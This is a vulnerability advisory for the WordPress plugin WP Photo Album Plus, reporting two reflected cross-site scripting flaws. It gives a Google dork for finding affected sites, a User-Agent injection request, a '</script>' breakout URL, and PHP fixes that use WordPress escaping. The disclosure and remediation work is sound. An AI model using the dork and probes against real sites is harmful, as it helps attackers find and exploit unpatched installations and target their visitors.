WP Photo Album Plus Security Vulnerabilities

Author: Milhouse
Download: https://wordpress.org/plugins/wp-photo-album-plus/
Home Page: http://wppa.opajaap.nl/
Google dork: inurl:wp-content/plugins/wp-photo-album-plus

Set up:
WordPress version: 3.9.1, 3.9.2
WP Photo Album Plus version: 5.4.4, 5.4.3
Client browsers: Firefox 31, Internet Explorer 8-11

Issue number 1: Cross-Site Scripting (reflected) vulnerability

Details: The plugin echoes the value of the HTTP header "User-Agent" back to the client browser without sanitization, allowing unsanitized JavaScript to be inserted into the page.

Severity: Low

Proof of Concept (POC):

Request:

GET / HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0) 47b5a-->0aa96
Accept-Encoding: gzip, deflate
Host:
DNT: 1
Proxy-Connection: Keep-Alive
Pragma: no-cache

Issue number 2: Cross-Site Scripting (reflected) vulnerability

Details: The value of the wppa-album parameter is inserted into a JavaScript string. A payload supplied in the wppa-album parameter is echoed back unmodified to the client browser.

Severity: High

Proof of Concept (POC):

http://vulnerablesite.example/?page_id=109&wppa-album=0178d4<%2fscript>
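As an added illustration (not the plugin's own code; the function names and the exact shape of the output sinks are assumed), the two patterns the advisory describes, each beside a fixed form that uses WordPress core escaping helpers:

```php
<?php
// Constructed illustration of the two sinks described in the advisory.
// Not the plugin's real code: function names and output shapes are assumed.

// --- Issue 1: User-Agent header echoed into the page ---
function render_browser_note_vulnerable() {
    // Raw header value lands in the HTML unescaped, so a value containing
    // "-->" can terminate the comment and everything after it is markup.
    $ua = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '';
    return '<!-- browser: ' . $ua . ' -->';
}

function render_browser_note_fixed() {
    $ua = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '';
    // esc_html() (WordPress core) encodes < > & " ' so the value can neither
    // close the comment nor open a tag. Better still: do not emit it at all.
    return '<!-- browser: ' . esc_html($ua) . ' -->';
}

// --- Issue 2: wppa-album parameter inserted into a JavaScript string ---
function album_script_vulnerable() {
    // Raw request value inside <script>: a "</script>" in the value ends the
    // block early, so escaping only quotes would not be enough either.
    $album = isset($_GET['wppa-album']) ? $_GET['wppa-album'] : '0';
    return "<script>var wppaAlbum = '" . $album . "';</script>";
}

function album_script_fixed() {
    // The album identifier is numeric, so enforce the type first
    // (absint() is WordPress core) ...
    $album = isset($_GET['wppa-album']) ? absint($_GET['wppa-album']) : 0;
    // ... and still escape on output: esc_js() backslash-escapes quotes and
    // newlines and HTML-encodes < and >, so "</script>" cannot close the block
    // even for values that must remain strings.
    return "<script>var wppaAlbum = '" . esc_js((string) $album) . "';</script>";
}
```

The type check alone closes issue 2 for this parameter; the output escaping is kept so the pattern stays safe if the value is ever widened to accept non-numeric input.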